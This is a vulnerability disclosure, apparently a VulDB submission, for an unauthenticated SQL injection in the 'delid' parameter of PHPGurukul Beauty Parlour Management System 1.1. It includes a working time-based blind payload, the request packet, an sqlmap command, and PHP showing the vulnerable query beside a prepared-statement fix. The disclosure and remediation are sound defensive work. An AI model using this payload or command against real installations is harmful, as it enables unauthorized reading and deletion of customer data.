Submission #665594: PHPGurukul Beauty Parlour Management System V1.1 SQL Injection Info

Title: PHPGurukul Beauty Parlour Management System V1.1 SQL Injection

Description:

## NAME OF AFFECTED PRODUCT(S)

- Beauty Parlour Management System

## Vendor Homepage

- https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/

## AFFECTED AND/OR FIXED VERSION(S)

### Submitter

- Li Hu - [email protected] - School of Cyberscience, University of Science and Technology of China

### Vulnerable File

- /admin/customer-list.php

### VERSION(S)

- V1.1

### Software Link

- https://phpgurukul.com/?sdm_process_download=1&download_id=10611

## PROBLEM TYPE

### Vulnerability Type

- SQL injection

### Root Cause

- A SQL injection vulnerability exists in the "/admin/customer-list.php" file of the "Beauty Parlour Management System" project. The value of the "delid" request parameter is used directly in a SQL query without any sanitization or validation, so an attacker who controls that parameter can change the structure of the query and make the database execute operations the application never intended.

### Impact

- Exploiting this SQL injection vulnerability allows an attacker to read the database without authorization, leak sensitive data, tamper with or delete records, potentially take control of the system, and disrupt service. This is a severe threat to both the security of the system and the continuity of business operations.

## DESCRIPTION

- During the security assessment of "Beauty Parlour Management System", I detected a critical SQL injection vulnerability in the "/admin/customer-list.php" file. This vulnerability is attributed to the insufficient validation of user input for the "delid" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective action is essential to safeguard system security and uphold data integrity.

## No login or authorization is required to exploit this vulnerability

## Vulnerability details and POC

### Vulnerability location:

- "delid" parameter

### Payload:

```txt
Parameter: delid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
Payload: delid=10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW
```

The payload is a time-based blind probe: the `--` comments out the rest of the original statement, `RLIKE` forces MySQL to evaluate the subquery, and `SLEEP(5)` delays the response. A response that takes about five seconds longer than the baseline request confirms the injection even though nothing from the database is returned in the page.

### Vulnerability Request Packet

```txt
GET /1/bpms/admin/customer-list.php?delid=10 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=n11ldb2a9k2k7539qsd6c5usit
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```

### The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

```bash
python sqlmap.py -r payload.txt --batch --level 3
```

Screenshot: https://github.com/user-attachments/assets/84afbd4b-170e-48ff-a8e7-c904ec43772a

## Suggested repair

1. **Employ prepared statements and parameter binding:** Prepared statements are an effective safeguard against SQL injection because they separate the SQL code from user-supplied data. With a prepared statement, a user-entered value is treated purely as data and can never be parsed as part of the SQL statement.
2. **Conduct input validation and filtering:** Rigorously validate and filter user input to guarantee that it conforms to the expected format (for a record identifier such as "delid", a positive integer). This blocks malformed input before it reaches the database layer.
3. **Minimize database user permissions:** Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day-to-day operations, so that a successful injection cannot escalate into full control of the database server.
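The vulnerable pattern described above placed beside the fix from the suggested repair, as an added PHP example that is not code from the PHPGurukul project. The table name `tblcustomer`, the column `ID`, the `mysqli` handle, and the database/account names `bpms` and `bpms_app` in the comments are assumptions for illustration; the advisory does not show the project's actual query or schema.

```php
<?php
// Added example, not the Beauty Parlour Management System's own code.
// Table/column names (tblcustomer, ID) are assumptions for illustration.

// --- Vulnerable pattern: the shape of bug the advisory describes ---
// The raw "delid" value is concatenated straight into the statement.
function deleteCustomerVulnerable(mysqli $con, string $delid): bool
{
    $sql = "DELETE FROM tblcustomer WHERE ID='" . $delid . "'";
    return $con->query($sql) !== false;
}

// With the sqlmap payload from the advisory the statement that reaches
// MySQL becomes:
//   DELETE FROM tblcustomer WHERE ID='10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW'
// "--" comments out the closing quote, RLIKE makes MySQL evaluate the
// subquery, and SLEEP(5) stalls the response: a ~5 s round trip is the
// only signal the attacker needs (time-based blind injection).

// --- Hardened version: validation + prepared statement ---
function deleteCustomerSafe(mysqli $con, string $delid): bool
{
    // Repair step 2: a record identifier must be a string of digits only.
    // ctype_digit() rejects the empty string, quotes, spaces and comments.
    if (!ctype_digit($delid)) {
        return false;
    }
    $id = (int) $delid;

    // Repair step 1: the SQL text is fixed; the value travels to the
    // server separately and can never be interpreted as SQL.
    $stmt = $con->prepare("DELETE FROM tblcustomer WHERE ID = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param("i", $id);   // "i" = bind as integer
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Repair step 3 (least privilege), run once by the DBA rather than by the
// application. Database and account names are assumptions:
//   CREATE USER 'bpms_app'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT, UPDATE, DELETE ON bpms.* TO 'bpms_app'@'localhost';
// No FILE, SUPER or GRANT OPTION, so even a successful injection is
// confined to the application's own tables.

// Usage (the advisory notes the endpoint is reachable without login, so
// the caller must also check the admin session before invoking this):
//   $con = new mysqli('localhost', 'bpms_app', '<password>', 'bpms');
//   deleteCustomerSafe($con, $_GET['delid'] ?? '');
```

The validation step alone would already stop the quoted payload, but the prepared statement is the control that holds even when a future query takes a free-text parameter that cannot be reduced to digits; the two are complementary, not alternatives.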
Source: https://github.com/f000x0/cve/issues/3
User: Li Hu (UID 89284)
Submitted: 2025-09-30 09:34 AM (7 months ago)
Moderation: 2025-10-07 12:54 PM (7 days later)
Status: Accepted
VulDB Entry: 327351 [PHPGurukul Beauty Parlour Management System 1.1 /admin/customer-list.php delid SQL injection]
Points: 20
